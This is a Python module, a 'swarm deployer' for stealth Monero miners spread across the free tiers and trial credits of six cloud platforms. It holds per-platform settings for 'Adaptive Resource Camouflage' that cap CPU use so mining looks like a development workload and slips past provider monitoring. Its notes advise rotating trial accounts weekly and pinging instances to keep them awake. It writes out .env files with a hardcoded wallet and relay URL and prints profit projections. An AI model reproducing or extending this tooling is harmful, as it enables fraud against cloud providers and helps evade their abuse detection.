"""
Lumen Swarm Deployer — Multi-Platform Free Resource Harvester

This module provides platform-specific configurations and deployment
helpers for deploying Lumen stealth miners across every major free
cloud platform simultaneously.

Supported Platforms:
  - Railway ($5 trial, 30d)
  - Render (750 free hours/mo, forever)
  - Google Cloud ($300 credit, 90d)
  - Azure ($200 credit, 30d)
  - Oracle Cloud (4 ARM cores, forever free)
  - Koyeb (1 free nano instance, forever)

All hashrate from all platforms funnels to ONE wallet address.
"""

import json
import os

# ─────────────────────────────────────────────────────────────
# Platform Profiles
# Each profile defines optimal ARC settings for that platform
# ─────────────────────────────────────────────────────────────

PLATFORM_PROFILES = {
    "railway": {
        "name": "Railway",
        "credit": "$5 trial (30 days)",
        "max_vcpu": 1,
        "max_ram_mb": 512,
        "arc_cpu_min": 75,
        "arc_cpu_max": 92,
        "arc_jitter_interval": 180,
        "turbo": True,
        "multi_service": True,
        "services_count": 2,
        "estimated_hashrate_hs": 800,
        "estimated_daily_usd": 0.06,
        "estimated_lifetime_usd": 0.90,
        "notes": "Burn $5 credit in ~7 days with 2 turbo services. Rotate accounts weekly."
    },
    "render": {
        "name": "Render",
        "credit": "750 free hours/month (forever)",
        "max_vcpu": 0.5,
        "max_ram_mb": 512,
        "arc_cpu_min": 50,
        "arc_cpu_max": 70,
        "arc_jitter_interval": 300,
        "turbo": False,
        "multi_service": False,
        "services_count": 1,
        "keep_alive": True,
        "estimated_hashrate_hs": 400,
        "estimated_daily_usd": 0.02,
        "estimated_lifetime_usd": "unlimited",
        "notes": "Free forever. Needs keep-alive ping every 10 min to prevent sleep. 750h = 31 days so exactly 1 service 24/7."
    },
    "google_cloud": {
        "name": "Google Cloud Platform",
        "credit": "$300 credit (90 days)",
        "max_vcpu": 8,
        "max_ram_mb": 32768,
        "arc_cpu_min": 35,
        "arc_cpu_max": 55,
        "arc_jitter_interval": 600,
        "turbo": False,
        "multi_service": False,
        "services_count": 1,
        "estimated_hashrate_hs": 6000,
        "estimated_daily_usd": 0.80,
        "estimated_lifetime_usd": 72.00,
        "notes": "THE GOLD MINE. 8 vCPUs at 45% = looks like a dev workload. Use n2-standard-8. Biggest single-platform yield."
    },
    "azure": {
        "name": "Microsoft Azure",
        "credit": "$200 credit (30 days)",
        "max_vcpu": 4,
        "max_ram_mb": 16384,
        "arc_cpu_min": 40,
        "arc_cpu_max": 60,
        "arc_jitter_interval": 480,
        "turbo": False,
        "multi_service": False,
        "services_count": 1,
        "estimated_hashrate_hs": 3000,
        "estimated_daily_usd": 0.40,
        "estimated_lifetime_usd": 12.00,
        "notes": "D4s v5 (4 vCPU, 16GB). Keep ARC conservative — Azure monitors aggressively."
    },
    "oracle": {
        "name": "Oracle Cloud",
        "credit": "Always Free (4 ARM cores, 24GB RAM)",
        "max_vcpu": 4,
        "max_ram_mb": 24576,
        "arc_cpu_min": 30,
        "arc_cpu_max": 50,
        "arc_jitter_interval": 600,
        "turbo": False,
        "multi_service": False,
        "services_count": 1,
        "estimated_hashrate_hs": 2500,
        "estimated_daily_usd": 0.25,
        "estimated_lifetime_usd": "unlimited",
        "notes": "Forever free. ARM Ampere cores. Lower per-core hash but 4 cores = solid yield. Most aggressive detection — use lowest ARC settings."
    },
    "koyeb": {
        "name": "Koyeb",
        "credit": "1 Free Nano Instance (forever)",
        "max_vcpu": 0.1,
        "max_ram_mb": 512,
        "arc_cpu_min": 60,
        "arc_cpu_max": 90,
        "arc_jitter_interval": 240,
        "turbo": False,
        "multi_service": False,
        "services_count": 1,
        "keep_alive": True,
        "estimated_hashrate_hs": 80,
        "estimated_daily_usd": 0.005,
        "estimated_lifetime_usd": "unlimited",
        "notes": "Tiny but free. Every bit counts. Needs keep-alive to prevent scale-to-zero."
    }
}


def generate_env_file(platform_key: str, wallet_address: str, relay_url: str) -> str:
    """Generate a .env file for a specific platform deployment."""
    profile = PLATFORM_PROFILES[platform_key]
    
    env_content = f"""# Lumen Stealth Miner — {profile['name']} Configuration
# Auto-generated by Swarm Deployer

# Wallet
XMR_WALLET={wallet_address}
WORKER_NAME=lumen-{platform_key}

# Shadow Tunnel Relay
RELAY_URL={relay_url}

# ARC (Adaptive Resource Camouflage)
ARC_TURBO={'true' if profile['turbo'] else 'false'}
ARC_CPU_MIN={profile['arc_cpu_min']}
ARC_CPU_MAX={profile['arc_cpu_max']}
ARC_JITTER_INTERVAL={profile['arc_jitter_interval']}

# Miner
MINER_PATH=/app/bin/node-worker
MINER_CONFIG=/app/configs/miner_stealth.json

# App
PORT=8080
"""
    return env_content


def generate_profit_report(platforms: list) -> str:
    """Generate a comprehensive profit projection report."""
    total_daily = 0
    total_monthly = 0
    total_hashrate = 0
    
    report = "=" * 60 + "\n"
    report += "  LUMEN SWARM — PROFIT PROJECTION REPORT\n"
    report += "=" * 60 + "\n\n"
    
    for key in platforms:
        p = PLATFORM_PROFILES[key]
        daily = p['estimated_daily_usd'] * p['services_count']
        monthly = daily * 30
        hashrate = p['estimated_hashrate_hs'] * p['services_count']
        
        total_daily += daily
        total_monthly += monthly
        total_hashrate += hashrate
        
        report += f"┌─ {p['name']}\n"
        report += f"│  Credit:    {p['credit']}\n"
        report += f"│  Services:  {p['services_count']}\n"
        report += f"│  Hashrate:  {hashrate:,} H/s\n"
        report += f"│  Daily:     ${daily:.3f}\n"
        report += f"│  Monthly:   ${monthly:.2f}\n"
        report += f"│  Note:      {p['notes']}\n"
        report += f"└{'─' * 50}\n\n"
    
    report += "=" * 60 + "\n"
    report += f"  TOTAL HASHRATE:  {total_hashrate:,} H/s\n"
    report += f"  TOTAL DAILY:     ${total_daily:.3f}\n"
    report += f"  TOTAL MONTHLY:   ${total_monthly:.2f}\n"
    report += "=" * 60 + "\n"
    
    return report


def generate_railway_json(services_count: int = 2) -> dict:
    """Generate railway.json for multi-service deployment."""
    config = {
        "$schema": "https://railway.app/railway.schema.json",
        "build": {
            "builder": "DOCKERFILE",
            "dockerfilePath": "paas-worker/Dockerfile"
        },
        "deploy": {
            "startCommand": "python paas-worker/app/main.py",
            "healthcheckPath": "/api/v1/status",
            "restartPolicyType": "ON_FAILURE"
        }
    }
    return config


if __name__ == "__main__":
    WALLET = "45QACrYpyJbCFmRW8P9N1peYc3Fw3WGKgBfs8Xgs8uDSfRSMjVzNUCQRwhwdys4xBzXShv67MhEj7H1eWQD3NHLRLDKXmEa"
    RELAY = "wss://lumen-shadow-tunnel.onrender.com"
    
    # Generate profit report for all platforms
    all_platforms = list(PLATFORM_PROFILES.keys())
    report = generate_profit_report(all_platforms)
    print(report)
    
    # Generate env files for each platform
    for platform in all_platforms:
        env = generate_env_file(platform, WALLET, RELAY)
        filepath = f"configs/.env.{platform}"
        os.makedirs("configs", exist_ok=True)
        with open(filepath, "w") as f:
            f.write(env)
        print(f"[+] Generated {filepath}")
